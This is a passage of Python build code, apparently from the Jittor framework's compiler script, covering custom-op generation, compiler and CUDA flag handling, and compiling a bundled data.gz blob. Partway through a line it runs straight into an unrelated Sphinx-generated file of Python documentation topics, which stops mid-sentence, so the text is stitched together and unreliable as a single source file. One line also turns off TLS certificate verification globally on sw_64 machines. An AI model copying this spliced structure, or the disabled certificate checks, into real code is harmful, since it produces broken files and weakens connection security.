os.path.splitext(name)[0] # xxx_xxx assert name.endswith("_op") func_name = name[:-3] # XxxXxxOp name2 = map(lambda s:s[:1].upper() + s[1:], name.split('_')) name2 = "".join(name2) with open(header, encoding='utf8') as f: src = f.read() # XxxXxxOp(args) res = re.findall(pybind_attrs_reg + '[^~]('+name2+"\\([^\\n]*\\))", src, re.S) assert len(res) >= 1, "Wrong op args in " + header # registe op cc_name = header[:-2] + ".cc" constructors = [] for i in range(len(res)): name = 'make_'+func_name+'_'*i constructors.append(f"{{ &typeid(&{name}), (void*)&{name} }}") constructors = ",".join(constructors) var_member_reg = r"\n\s*Var\b(.*);" var_member_match = re.findall(var_member_reg, src) var_member_match = " ".join(var_member_match) for c in "*,": var_member_match = var_member_match.replace(c, " ") var_member = var_member_match.split() LOG.vv("var_member_match "+var_member_match) LOG.vv("var_member "+str(var_member)) var_member_src = [ f"VAR_MEMBER_NAME_AND_OFFSET({name}, {name2})" for name in var_member ] var_member_src = ",".join(var_member_src) initer.append(f'\n op_registe({{ "{func_name}", R"({cc_name})", extra_flags, {{{constructors}}}, {{{var_member_src}}} }});') for hid, h_def in enumerate(res): h_def = list(h_def) # // @attrs(...) attrs = {} if h_def[4] != "": attrs = pyjt_compiler.parse_attrs(h_def[5]) del h_def[4:6] # /* doc_string */ # // @pybind(bind_name) # XxxXxxOp(args_def) doc_string = h_def[1].strip() h_def = h_def[2:] args_def = h_def[2][len(name2)+1:-1] bind_name = h_def[1] if bind_name == "": bind_name = func_name if args_def=="": args = [] else: args = list(map(lambda s: s.split()[-1].split('=')[0], args_def.split(','))) # py_args: "arg"_a=default py_args = [] new_args_def = [] new_args = [] # source of convert VarHolder* to Var* vh2v_src = [] more_src = [] for arg, arg_def in zip(args, args_def.split(',')): py_arg = f'"{arg}"_a' if '=' in arg_def: py_arg += "=" + arg_def.split('=')[-1] arg_def = arg_def.split('=')[0] py_args.append(py_arg) arg_type = arg_def[:-(len(arg)+1)].strip() if arg_type == "Var*": new_args_def.append("VarHolder* " + arg) vh2v_src.append(arg + "->var") new_args.append(arg + "->var") elif arg_type.startswith("vector<Var*>"): new_args_def.append( arg_type.replace("Var", "VarHolder")+' '+arg) new_args.append(arg) more_src.append(f"_op->add_inputs({arg});") elif arg_type.startswith("VarSlices"): new_args_def.append(arg_def) new_args.append(arg) more_src.append(f""" vector<Var*> svars; for (int i=0; i<_op->vs.n; i++) if (_op->vs.slices[i].is_var()) svars.push_back(_op->vs.slices[i].var); _op->add_inputs(svars);""") else: new_args_def.append(arg_def) new_args.append(arg) vh2v_src = "_op->set_inputs({" + ", ".join(vh2v_src) + "});" + \ "".join(more_src) LOG.vvvv(f"Find op: {name2} args: {new_args}") # if header.startswith("src/"): # jit_headers += f"#include \"{header[4:]}\"\n" # else: jit_headers += f"#include \"{header}\"\n" add_src( func_name+'_'*hid, new_args_def, name2, new_args, vh2v_src, bind_name, py_args, jit_cc_src, doc_string, attrs ) if func_name in ["binary", "unary", "reduce"]: # generate binary op alias with open(os.path.join(jittor_path, f"src/ops/{func_name}_op.cc"), encoding="utf-8") as f: src = f.read() src = src.split(f"unordered_set<string> {func_name}_ops = ""{")[1].split("};")[0] match_result = re.findall(pybind_reg + "\"([a-z_A-Z0-9]*)\"", src, re.S) # remove /* doc_string */ pattern res2 = [ (_[3], _[4]) for _ in match_result ] LOG.vvvv(f"All supported {func_name} ops: {res2}") # remove op args if func_name == "reduce": args_def = new_args_def[:1] + new_args_def[2:] py_args_s = py_args[:1] + py_args[2:] else: args_def = new_args_def[:-1] py_args_s = py_args[:-1] # find the last type id(float64) # add "_" suffix for all function if func_name == "unary": last_tid = res2.index(("","float64")) # for each functor for tid, (bind_name, func_name2) in enumerate(res2): # get certain op doc_string doc_string2 = match_result[tid][1].strip() if len(doc_string2) == 0: doc_string2 = doc_string # add _ for types if func_name == "unary" and tid <= last_tid: func_name3 = func_name2 + "_" elif func_name == "reduce": func_name4 = func_name2 func_name2 = "reduce_" + func_name2 func_name3 = func_name2 else: func_name3 = func_name2 if len(bind_name) == 0: bind_name = func_name2 if func_name == "reduce": args = new_args[:1] + [f'ns_{func_name4}'] + new_args[2:] else: args = new_args[:-1] + [f'ns_{func_name2}'] add_src( func_name3+'_'*hid, args_def, name2, args, vh2v_src, bind_name, py_args_s, jit_cc_src, doc_string2, attrs ) jit_src = f""" #pragma once #include "pyjt/py_obj_holder.h" #include "var.h" #include "var_holder.h" #include "ops/op_register.h" {jit_headers} namespace jittor {{ // fix make_array(py::array) undefine reference #pragma GCC visibility push(default) #define JIT_NAMESPACE {export+"_maker" if export else "jit_op_maker"} // @pyjt(ops) // @attrs(submodule{",core_name="+export if export else ""}) namespace JIT_NAMESPACE {{ {"".join(jit_cc_src)} void initer() {{ string extra_flags = R"({extra_flags})"; {"".join(initer)} }} int caller = (initer(), 0); }} // JIT_NAMESPACE }} // jittor {f''' namespace jittor {{ extern void pyjt_def_{export}(PyObject*); }} static void init_module(PyModuleDef* mdef, PyObject* m) {{ mdef->m_doc = "User defined custom ops"; jittor::pyjt_def_{export}(m); }} PYJT_MODULE_INIT({export}); ''' if export else ""} """ return jit_src @lock.lock_scope() def compile_custom_op(header, source, op_name, warp=True): """Compile a single custom op header: code of op header, not path source: code of op source, not path op_name: op_name of this op, it will used for generation of header and source files, if the type name of op is XxxXxxOp, op_name should be xxx_xxx warp: if true, warp a snippet for header and source """ if warp: header = f""" #pragma once #include "op.h" #include "var.h" namespace jittor {{ {header} }} """ source = f""" #include "{op_name}_op.h" namespace jittor {{ {source} }} """ cops_dir = os.path.join(cache_path, "custom_ops") make_cache_dir(cops_dir) hname = os.path.join(cops_dir, op_name+"_op.h") ccname = os.path.join(cops_dir, op_name+"_op.cc") with open(hname, 'w') as f: f.write(header) with open(ccname, 'w') as f: f.write(source) m = compile_custom_ops([hname, ccname]) return getattr(m, op_name) @lock.lock_scope() def compile_custom_ops( filenames, extra_flags="", return_module=False, dlopen_flags=None, gen_name_ = ""): """Compile custom ops filenames: path of op source files, filenames must be pairs of xxx_xxx_op.cc and xxx_xxx_op.h, and the type name of op must be XxxXxxOp. extra_flags: extra compile flags return_module: return module rather than ops(default: False) return: compiled ops """ if dlopen_flags is None: dlopen_flags = os.RTLD_GLOBAL | os.RTLD_NOW if platform.system() == 'Linux': dlopen_flags |= os.RTLD_DEEPBIND srcs = {} headers = {} builds = [] includes = [] pyjt_includes = [] for name in filenames: name = os.path.realpath(name) if name.endswith(".cc") or name.endswith(".cpp") or name.endswith(".cu"): builds.append(name) if name.endswith(".h"): dirname = os.path.dirname(name) if dirname.endswith("inc"): includes.append(dirname) with open(name, "r") as f: if "@pyjt" in f.read(): pyjt_includes.append(name) bname = os.path.basename(name) bname = os.path.splitext(bname)[0] if bname.endswith("_op"): bname = bname[:-3] if name.endswith(".cc"): srcs[bname] = name elif name.endswith(".h"): includes.append(os.path.dirname(name)) headers[bname] = name assert len(srcs) == len(headers), "Source and header names not match" for name in srcs: assert name in headers, f"Header of op {name} not found" gen_name = "gen_ops_" + "_".join(headers.keys()) if gen_name_ != "": gen_name = gen_name_ if len(gen_name) > 50: gen_name = gen_name[:50] + "___hash" + hashlib.md5(gen_name.encode()).hexdigest()[:6] includes = sorted(list(set(includes))) includes = "".join(map(lambda x: f" -I\"{x}\" ", includes)) LOG.vvvv(f"Include flags:{includes}") op_extra_flags = includes + extra_flags lib_path = os.path.join(cache_path, "custom_ops") make_cache_dir(lib_path) gen_src_fname = os.path.join(lib_path, gen_name+".cc") gen_head_fname = os.path.join(lib_path, gen_name+".h") gen_lib = os.path.join(lib_path, gen_name+extension_suffix) libname = gen_name + lib_suffix op_extra_flags += f" -L\"{lib_path}\" -l\"{libname}\" " gen_src = gen_jit_op_maker(headers.values(), export=gen_name, extra_flags=op_extra_flags) pyjt_compiler.compile_single(gen_head_fname, gen_src_fname, src=gen_src) # gen src initialize first builds.insert(0, gen_src_fname) def insert_anchor(gen_src, anchor_str, insert_str): # insert insert_str after anchor_str into gen_src return gen_src.replace(anchor_str, anchor_str+insert_str, 1) for name in pyjt_includes: LOG.v("handle pyjt_include ", name) bname = os.path.basename(name).split(".")[0] gen_src_fname = os.path.join(cache_path, "custom_ops", gen_name+"_"+bname+".cc") pyjt_compiler.compile_single(name, gen_src_fname) builds.insert(1, gen_src_fname) gen_src = insert_anchor(gen_src, "namespace jittor {", f"extern void pyjt_def_{bname}(PyObject* m);") gen_src = insert_anchor(gen_src, "init_module(PyModuleDef* mdef, PyObject* m) {", f"jittor::pyjt_def_{bname}(m);") with open(gen_head_fname, "w") as f: f.write(gen_src) LOG.vvv(f"Build custum ops lib:{gen_lib}") LOG.vvvv(f"Build sources:{builds}") compile(cc_path, extra_flags+cc_flags+opt_flags+includes, builds, gen_lib) # add python path and import LOG.vvv(f"Import custum ops lib:{gen_lib}") lib_path = os.path.join(cache_path, "custom_ops") if lib_path not in os.sys.path: os.sys.path.append(lib_path) # unlock scope when initialize with lock.unlock_scope(): with jit_utils.import_scope(dlopen_flags): exec(f"import {gen_name}") mod = locals()[gen_name] if return_module: return mod return mod.ops def get_full_path_of_executable(name): full_path = os.path.abspath(name) while os.path.islink(full_path): full_path = os.path.realpath(full_path) if os.path.isfile(full_path) and os.access(full_path, os.X_OK): return full_path return get_full_path_of_executable(find_exe(name)) def compile_extern(): # compile llvm passes if cc_type != "clang" or platform.system() != 'Linux': return global kernel_opt_flags cache_path_llvm = os.path.join(cache_path, "llvm") jittor_path_llvm = os.path.join(jittor_path, "extern", "llvm") clang_dir = os.path.dirname(get_full_path_of_executable(cc_path)) assert clang_dir.endswith("bin") and "llvm" in clang_dir, f"Wrong clang_dir: {clang_dir}" llvm_include = os.path.abspath(os.path.join(clang_dir, "..", "include")) assert os.path.isdir(llvm_include), "LLVM include path not found" make_cache_dir(cache_path_llvm) files = os.listdir(jittor_path_llvm) # test_pass.cc is used for test link problem of llvm pass plugin test_pass_path = os.path.join(cache_path_llvm, "test_pass.cc") with open(test_pass_path, 'w') as f: f.write("int main() {return 0;}") # -fno-rtti fix link error # -Wl,-znodelete fix segfault # https://github.com/sampsyo/llvm-pass-skeleton/issues/7#issuecomment-401834287 # -D_GLIBCXX_USE_CXX11_ABI=0 fix undefined symbol: createPrinterPass # https://stackoverflow.com/questions/37366291/undefined-symbol-for-self-built-llvm-opt # try different flags try_flags = [ " -Wl,-znodelete -D_GLIBCXX_USE_CXX11_ABI=0 ", " -Wl,-znodelete ", ] found_flags_id = -1 for fname in files: for i, flag in enumerate(try_flags): if found_flags_id != -1 and found_flags_id != i: continue so_name = os.path.join(cache_path_llvm, os.path.splitext(fname)[0]+f".{i}.so") compile( cc_path, f"{cc_flags} {opt_flags} {flag} -I'{llvm_include}'", [os.path.join(jittor_path_llvm, fname)], so_name ) # if not found available flags, we test it. if found_flags_id == -1: try: s = run_cmd( f"{cc_path} {cc_flags} -Xclang -load -Xclang '{so_name}' {test_pass_path}", cache_path_llvm, print_error=False ) except Exception as e: LOG.v(f"Try flag {flag} failed: {e}") continue found_flags_id = i kernel_opt_flags += f" -Xclang -load -Xclang '{so_name}' " break else: LOG.w("Clang is used, but LLVM pass plugin is unable to link.") break LOG.vv(f"Compile extern llvm passes: {str(files)}") def check_cuda(): if not nvcc_path: return global cc_flags, has_cuda, core_link_flags, cuda_dir, cuda_lib, cuda_include, cuda_home, cuda_bin cuda_dir = os.path.dirname(get_full_path_of_executable(nvcc_path)) cuda_bin = cuda_dir cuda_home = os.path.abspath(os.path.join(cuda_dir, "..")) # try default nvidia-cuda-toolkit in Ubuntu 20.04 # assert cuda_dir.endswith("bin") and "cuda" in cuda_dir.lower(), f"Wrong cuda_dir: {cuda_dir}" cuda_include = os.path.abspath(os.path.join(cuda_dir, "..", "include")) cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib64")) if nvcc_path == "/usr/bin/nvcc": # this nvcc is install by package manager cuda_lib = "/usr/lib/x86_64-linux-gnu" cuda_include2 = os.path.join(jittor_path, "extern","cuda","inc") cc_flags += f" -DHAS_CUDA -I\"{cuda_include}\" -I\"{cuda_include2}\" " if os.name == 'nt': cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib", "x64")) # cc_flags += f" \"{cuda_lib}\\cudart.lib\" " cuda_lib_path = glob.glob(cuda_bin+"/cudart64*")[0] cc_flags += f" -lcudart -L\"{cuda_lib}\" -L\"{cuda_bin}\" " dll = ctypes.CDLL(cuda_lib_path, dlopen_flags) ret = dll.cudaDeviceSynchronize() assert ret == 0 else: cc_flags += f" -lcudart -L\"{cuda_lib}\" " # ctypes.CDLL(cuda_lib+"/libcudart.so", import_flags) ctypes.CDLL(cuda_lib+"/libcudart.so", dlopen_flags) has_cuda = 1 def check_cache_compile(): files = [ "src/utils/cache_compile.cc", "src/utils/log.cc", "src/utils/tracer.cc", "src/utils/jit_utils.cc", "src/utils/str_utils.cc", ] if os.name == 'nt': files = [ x.replace('/', '\\') for x in files ] global jit_utils_core_files jit_utils_core_files = files recompile = compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) if recompile and jit_utils.cc: LOG.e("jit_utils updated, please rerun your command.") sys.exit(0) if not jit_utils.cc: with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() assert jit_utils.cc # recompile, generate cache key compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) def env_or_try_find(name, bname): if name in os.environ: path = os.environ[name] if path != "": version = jit_utils.get_version(path) LOG.i(f"Found {bname}{version} at {path}") return path return try_find_exe(bname) def try_find_exe(*args): try: return find_exe(*args) except: LOG.v(f"{args[0]} not found.") return "" def check_pybt(gdb_path, python_path): if gdb_path=='' or python_path=='': return False return True # TODO: prev we use below code to check has py-bt or nor # but it is too slow, so we comment it, # find a better way to check py-bt exist # ret = sp.getoutput(f"{gdb_path} --batch {python_path} -ex 'help py-bt'") # if 'python frame' in ret: # LOG.v("py-bt found in gdb.") # return True # return False def check_debug_flags(): global is_debug is_debug = 0 if os.environ.get("debug")=="1": is_debug = 1 global cc_flags cc_flags += " -g -DNODE_MEMCHECK " cc_flags = " " # os.RTLD_NOW | os.RTLD_GLOBAL cause segfault when import torch first import_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND # if cc_type=="icc": # # weird link problem, icc omp library may conflict and cause segfault # import_flags = os.RTLD_NOW | os.RTLD_GLOBAL dlopen_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() jittor_path = find_jittor_path() check_debug_flags() sys.path.append(cache_path) LOG.i(f"Jittor({__version__}) src: {jittor_path}") LOG.i(f"{jit_utils.cc_type} at {jit_utils.cc_path}{jit_utils.get_version(jit_utils.cc_path)}") LOG.i(f"cache_path: {cache_path}") with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() python_path = sys.executable # sometime python do not return the correct sys executable # this will happend when multiple python version installed ex_python_path = python_path + '.' + str(sys.version_info.minor) if os.path.isfile(ex_python_path): python_path = ex_python_path # if jtcuda is already installed nvcc_path = None if install_cuda.has_installation() or os.name == 'nt': nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) # check system installed cuda if not nvcc_path: nvcc_path = env_or_try_find('nvcc_path', 'nvcc') or \ try_find_exe('/usr/local/cuda/bin/nvcc') or \ try_find_exe('/usr/bin/nvcc') or \ try_find_exe('/opt/cuda/bin/nvcc') # if system has no cuda, install jtcuda if not nvcc_path: nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) if nvcc_path is None: nvcc_path = "" gdb_path = env_or_try_find('gdb_path', 'gdb') addr2line_path = try_find_exe('addr2line') has_pybt = check_pybt(gdb_path, python_path) if nvcc_path: # gen cuda key for cache_path cu = "cu" v = jit_utils.get_version(nvcc_path)[1:-1] nvcc_version = list(map(int,v.split('.'))) cu += v try: r, s = sp.getstatusoutput(f"{sys.executable} -m jittor_utils.query_cuda_cc") if r==0: s = sorted(list(set(s.strip().split()))) cu += "_sm_" + "_".join(s) if "cuda_arch" not in os.environ: os.environ["cuda_arch"] = " ".join(cu) except: pass LOG.i("cuda key:", cu) cache_path = os.path.join(cache_path, cu) sys.path.append(cache_path) def check_clang_latest_supported_cpu(): output = run_cmd('clang --print-supported-cpus') apple_cpus = [l.strip() for l in output.split('\n') if 'apple-a' in l] apple_cpus_id = max([int(cpu[7:]) for cpu in apple_cpus]) return f'apple-a{apple_cpus_id}' # cc_flags += " -Wall -Werror -Wno-unknown-pragmas -std=c++14 -fPIC " cc_flags += " -Wall -Wno-unknown-pragmas -std=c++14 -fPIC " # 1. Arch/CPU specific optimization if platform.machine() in ["x86_64", "AMD64"]: cc_flags += " -march=native " elif platform.machine() == 'arm64' and platform.system() == "Darwin": cc_flags += f" -mcpu={check_clang_latest_supported_cpu()} " cc_flags += " -fdiagnostics-color=always " # 2. Non standard include path if platform.system() == 'Darwin' and platform.machine() == 'arm64': cc_flags += " -I/opt/homebrew/include " # 3. User specified flags if "cc_flags" in os.environ: cc_flags += os.environ["cc_flags"] + ' ' cc_flags += " -lstdc++ -ldl -shared " if platform.system() == 'Darwin': # TODO: if not using apple clang, there is no need to add -lomp cc_flags += "-undefined dynamic_lookup -lomp " if platform.machine() == "arm64": cc_flags += " -L/opt/homebrew/lib " opt_flags = "" py_include = jit_utils.get_py3_include_path() LOG.v(f"py_include: {py_include}") extension_suffix = jit_utils.get_py3_extension_suffix() lib_suffix = extension_suffix.rsplit(".", 1)[0] LOG.v(f"extension_suffix: {extension_suffix}") so = ".so" if os.name != 'nt' else ".dll" kernel_opt_flags = os.environ.get("kernel_flags", "") + opt_flags if platform.system() == 'Darwin': # TODO: if not using apple clang, cannot add -Xpreprocessor kernel_opt_flags += " -Xpreprocessor -fopenmp " elif cc_type != 'cl': kernel_opt_flags += " -fopenmp " def fix_cl_flags(cmd): output = shsplit(cmd) output2 = [] libpaths = [] for s in output: if s.startswith("-l") and ("cpython" in s or "lib" in s): if platform.system() == 'Darwin': fname = s[2:] + ".so" for path in reversed(libpaths): full = os.path.join(path, fname).replace("\"", "") if os.path.isfile(full): output2.append(full) break else: output2.append(s) else: output2.append(f"-l:{s[2:]}.so") elif s.startswith("-L"): libpaths.append(s[2:]) output2.append(f"{s} -Wl,-rpath,{s[2:]}") else: output2.append(s) return " ".join(output2) if os.name == 'nt': if cc_type == 'g++': pass elif cc_type == 'cl': py3_link_path = os.path.join( os.path.dirname(sys.executable), "libs", ) cc_flags = remove_flags(cc_flags, ["-f", "-m"]) cc_flags = cc_flags.replace("-std=c++14", "-std=c++17") cc_flags = cc_flags.replace("-lstdc++", "") cc_flags = cc_flags.replace("-ldl", "") cc_flags += f" -L\"{py3_link_path}\" -lpython3{sys.version_info.minor} " cc_flags += " -EHa -MD " import jittor_utils if jittor_utils.msvc_path: mp = jittor_utils.msvc_path cc_flags += f' -nologo -I"{mp}\\VC\\include" -I"{mp}\\win10_kits\\include\\ucrt" -I"{mp}\\win10_kits\\include\\shared" -I"{mp}\\win10_kits\\include\\um" -DNOMINMAX ' cc_flags += f' -L"{mp}\\VC\\lib" -L"{mp}\\win10_kits\\lib\\um\\x64" -L"{mp}\\win10_kits\\lib\\ucrt\\x64" ' win_libpaths = {} def fix_cl_flags(cmd): cmd = cmd.replace(".o ", ".obj ") cmd = cmd.replace(".o\"", ".obj\"") if cmd.endswith(".o"): cmd += "bj" if " -o " in cmd: if " -shared " in cmd: cmd = cmd.replace(" -o ", " -Fe: ") output = shsplit(cmd.split("-Fe:")[1].strip())[0] base_output = os.path.basename(output).split('.')[0] cmd += f" -DEF:\"{output}.def\" -IGNORE:4102 -IGNORE:4197 -IGNORE:4217 " elif " -c -o " in cmd: cmd = cmd.replace(" -c -o ", " -c -Fo: ") flags = shsplit(cmd) output = [] output2 = [] for f in flags: if f.startswith("-link"): pass elif f.startswith("-l"): output2.append(f[2:]+".lib") elif f.startswith("-LIB"): output2.append(f) elif f.startswith("-LD"): output.append(f) elif f.startswith("-L"): path = f[2:].replace("\"", "") if path not in win_libpaths: win_libpaths[path] = 1 os.add_dll_directory(path) os.environ["PATH"] = f";{path};" + os.environ["PATH"] output2.append("-LIBPATH:"+f[2:]) elif ".lib" in f: output2.append(f) elif f.startswith("-DEF:"): output2.append(f) elif f.startswith("-W") or f.startswith("-f"): pass elif f.startswith("-std="): output.append(f.replace("=", ":")) else: output.append(f) cmd = " ".join(output) if len(output2): cmd += " -link " + " ".join(output2) cmd = cmd.replace("-include", "-FI") cmd = cmd.replace("-shared", "-LD") return cmd if ' -O' not in cc_flags: opt_flags += " -O2 " kernel_opt_flags += " -Ofast " lto_flags = "" if os.environ.get("enable_lto") == "1": if cc_type == "icc": lto_flags = " -flto -ipo -ipo-c " elif cc_type == "g++": lto_flags = " -flto -fuse-linker-plugin " else: lto_flags = " -flto " make_cache_dir(cache_path) make_cache_dir(os.path.join(cache_path, "jit")) make_cache_dir(os.path.join(cache_path, "obj_files")) make_cache_dir(os.path.join(cache_path, "gen")) make_cache_dir(os.path.join(cache_path, "tmp")) ck_path = os.path.join(cache_path, "checkpoints") make_cache_dir(ck_path) # build cache_compile cc_flags += f" -I\"{os.path.join(jittor_path, 'src')}\" " cc_flags += py_include check_cache_compile() LOG.v(f"Get cache_compile: {jit_utils.cc}") # check cuda has_cuda = 0 check_cuda() nvcc_flags = os.environ.get("nvcc_flags", "") if has_cuda: nvcc_flags += cc_flags def convert_nvcc_flags(nvcc_flags): # nvcc don't support -Wall option if os.name == 'nt': nvcc_flags = nvcc_flags.replace("-fp:", "-Xcompiler -fp:") nvcc_flags = nvcc_flags.replace("-EH", "-Xcompiler -EH") nvcc_flags = nvcc_flags.replace("-M", "-Xcompiler -M") nvcc_flags = nvcc_flags.replace("-nologo", "") nvcc_flags = nvcc_flags.replace("-std:", "-std=") nvcc_flags = nvcc_flags.replace("-Fo:", "-o") nvcc_flags = nvcc_flags.replace("-LD", "-shared") nvcc_flags = nvcc_flags.replace("-LIBPATH:", "-L") nvcc_flags = nvcc_flags.replace("-link", "") def func(x): if ".lib" not in x: return x x = x.replace("\"", "") a = os.path.dirname(x) b = os.path.basename(x) if not b.endswith(".lib"): return x return f"-L\"{a}\" -l{b[:-4]}" nvcc_flags = map_flags(nvcc_flags, func) if nvcc_version >= [11,4]: nvcc_flags = nvcc_flags.replace("-std=c++17", "-std=c++14 -Xcompiler -std:c++14") else: nvcc_flags = nvcc_flags.replace("-std=c++17", "") nvcc_flags = nvcc_flags.replace("-Wall", "") nvcc_flags = nvcc_flags.replace("-Wno-unknown-pragmas", "") nvcc_flags = nvcc_flags.replace("-fopenmp", "") nvcc_flags = nvcc_flags.replace("-march", "-Xcompiler -march") nvcc_flags = nvcc_flags.replace("-Werror", "") nvcc_flags = nvcc_flags.replace("-fPIC", "-Xcompiler -fPIC") nvcc_flags = nvcc_flags.replace("-fdiagnostics", "-Xcompiler -fdiagnostics") nvcc_flags += f" -x cu --cudart=shared -ccbin=\"{cc_path}\" --use_fast_math " # nvcc warning is noise nvcc_flags += " -w " nvcc_flags += f" -I\"{os.path.join(jittor_path, 'extern/cuda/inc')}\" " if os.environ.get("cuda_debug", "0") == "1": nvcc_flags += " -G " return nvcc_flags nvcc_flags = convert_nvcc_flags(nvcc_flags) # build core gen_jit_flags() gen_jit_tests() op_headers = glob.glob(jittor_path+"/src/ops/**/*op.h", recursive=True) jit_src = gen_jit_op_maker(op_headers) LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_op_maker.h"), 'w') as f: f.write(jit_src) cc_flags += f' -I\"{cache_path}\" -L\"{cache_path}\" -L\"{jit_utils.cache_path}\" ' # gen pyjt pyjt_gen_src = pyjt_compiler.compile(cache_path, jittor_path) # initialize order: # 1. registers # 2. generate source # 3. op_utils # 4. other files2 = pyjt_gen_src ext_args = 'c[cu]' if has_cuda else 'cc' files4 = glob.glob(jittor_path+"/src/**/*."+ext_args, recursive=True) files4 = [ f[len(jittor_path)+1:] for f in files4 ] # files4 = run_cmd('find -L src | grep '+grep_args, jittor_path).splitlines() at_beginning = [ "src/ops/op_utils.cc", "src/event_queue.cc", "src/mem/allocator/sfrl_allocator.cc", "src/mem/allocator.cc", "src/misc/nano_string.cc", ] at_last = [ "src/profiler/profiler.cc", "src/executor.cc", ] if os.name == 'nt': at_beginning = [ x.replace('/','\\') for x in at_beginning ] at_last = [ x.replace('/','\\') for x in at_last ] for i in range(len(at_beginning)): files4.remove(at_beginning[i]) files4.insert(i, at_beginning[i]) for v in at_last: files4.remove(v) files4.append(v) registers = [ name for name in files4 if "register" in name ] for name in registers: files4.remove(name) files = registers + files2 + files4 for file in jit_utils_core_files: files.remove(file) LOG.vv("compile order:", files) if platform.system() == 'Linux': libname = {"clang":"omp", "icc":"iomp5", "g++":"gomp"}[cc_type] libname = ctypes.util.find_library(libname) assert libname is not None, "openmp library not found" ctypes.CDLL(libname, os.RTLD_NOW | os.RTLD_GLOBAL) if platform.machine()=='sw_64': import ssl ssl._create_default_https_context = ssl._create_unverified_context data_gz_path = os.path.join(jittor_path, "utils", "data.gz") use_data_gz = os.path.isfile(data_gz_path) if os.environ.get("use_data_gz", "1") == "0": use_data_gz = False if use_data_gz: import gzip with gzip.open(data_gz_path, 'rb') as f: data = f.read() md5 = hashlib.md5(data).hexdigest() target_md5 = None data_gz_md5_path = os.path.join(cache_path, "data.md5") if os.path.isfile(data_gz_md5_path): with open(data_gz_md5_path, 'r') as f: target_md5 = f.read() data_o_path = os.path.join(cache_path, "data.o") if target_md5 != md5: data_s_path = os.path.join(cache_path, "data.cc") with open(data_s_path, "w") as f: f.write(data.decode("utf8")) dflags = (cc_flags+opt_flags)\ .replace("-Wall", "") \ .replace("-Werror", "") \ .replace("-shared", "") vdp = os.path.join(jittor_path, "src", "utils", "vdp") run_cmd(fix_cl_flags(f"{cc_path} {dflags} -include \"{vdp}\" \"{data_s_path}\" -c -o \"{data_o_path}\"")) os.remove(data_s_path) with open(data_gz_md5_path, 'w') as f: f.write(md5) files.append(data_o_path) files = [f for f in files if "__data__" not in f] cc_flags += f" -l\"jit_utils_core{lib_suffix}\" " compile(cc_path, cc_flags+opt_flags, files, 'jittor_core'+extension_suffix) cc_flags += f" -l\"jittor_core{lib_suffix}\" " # TODO: move to compile_extern.py # compile_extern() with jit_utils.import_scope(import_flags): import jittor_core as core flags = core.Flags() if has_cuda: nvcc_flags = convert_nvcc_flags(cc_flags) nvcc_version = list(jit_utils.get_int_version(nvcc_path)) max_arch = 1000 if nvcc_version < [11,]: max_arch = 75 elif nvcc_version < [11,1]: max_arch = 80 if len(flags.cuda_archs): min_arch = 30 archs = [] for arch in flags.cuda_archs: if arch<min_arch: LOG.w(f"CUDA arch({arch})<{min_arch} is not supported") continue if arch>max_arch: LOG.w(f"CUDA arch({arch})>{max_arch} will be backward-compatible") arch = max_arch archs.append(arch) flags.cuda_archs = archs nvcc_flags += f" -arch=compute_{min(archs)} " nvcc_flags += ''.join(map(lambda x:f' -code=sm_{x} ', archs)) flags.cc_path = cc_path flags.cc_type = cc_type flags.cc_flags = cc_flags + kernel_opt_flags flags.nvcc_path = nvcc_path flags.nvcc_flags = nvcc_flags flags.python_path = python_path flags.cache_path = cache_path flags.jittor_path = jittor_path flags.gdb_path = gdb_path flags.addr2line_path = addr2line_path flags.has_pybt = has_pybt core.set_lock_path(lock.lock_path)
# -*- coding: utf-8 -*- # Autogenerated by Sphinx on Wed Jan 6 03:48:54 2016 topics = {'assert': u'\nThe "assert" statement\n**********************\n\nAssert statements are a convenient way to insert debugging assertions\ninto a program:\n\n assert_stmt ::= "assert" expression ["," expression]\n\nThe simple form, "assert expression", is equivalent to\n\n if __debug__:\n if not expression: raise AssertionError\n\nThe extended form, "assert expression1, expression2", is equivalent to\n\n if __debug__:\n if not expression1: raise AssertionError(expression2)\n\nThese equivalences assume that "__debug__" and "AssertionError" refer\nto the built-in variables with those names. In the current\nimplementation, the built-in variable "__debug__" is "True" under\nnormal circumstances, "False" when optimization is requested (command\nline option -O). The current code generator emits no code for an\nassert statement when optimization is requested at compile time. Note\nthat it is unnecessary to include the source code for the expression\nthat failed in the error message; it will be displayed as part of the\nstack trace.\n\nAssignments to "__debug__" are illegal. The value for the built-in\nvariable is determined when the interpreter starts.\n', 'assignment': u'\nAssignment statements\n*********************\n\nAssignment statements are used to (re)bind names to values and to\nmodify attributes or items of mutable objects:\n\n assignment_stmt ::= (target_list "=")+ (expression_list | yield_expression)\n target_list ::= target ("," target)* [","]\n target ::= identifier\n | "(" target_list ")"\n | "[" target_list "]"\n | attributeref\n | subscription\n | slicing\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn assignment statement evaluates the expression list (remember that\nthis can be a single expression or a comma-separated list, the latter\nyielding a tuple) and assigns the single resulting object to each of\nthe target lists, from left to right.\n\nAssignment is defined recursively depending on the form of the target\n(list). When a target is part of a mutable object (an attribute\nreference, subscription or slicing), the mutable object must\nultimately perform the assignment and decide about its validity, and\nmay raise an exception if the assignment is unacceptable. The rules\nobserved by various types and the exceptions raised are given with the\ndefinition of the object types (see section The standard type\nhierarchy).\n\nAssignment of an object to a target list is recursively defined as\nfollows.\n\n* If the target list is a single target: The object is assigned to\n that target.\n\n* If the target list is a comma-separated list of targets: The\n object must be an iterable with the same number of items as there\n are targets in the target list, and the items are assigned, from\n left to right, to the corresponding targets.\n\nAssignment of an object to a single target is recursively defined as\nfollows.\n\n* If the target is an identifier 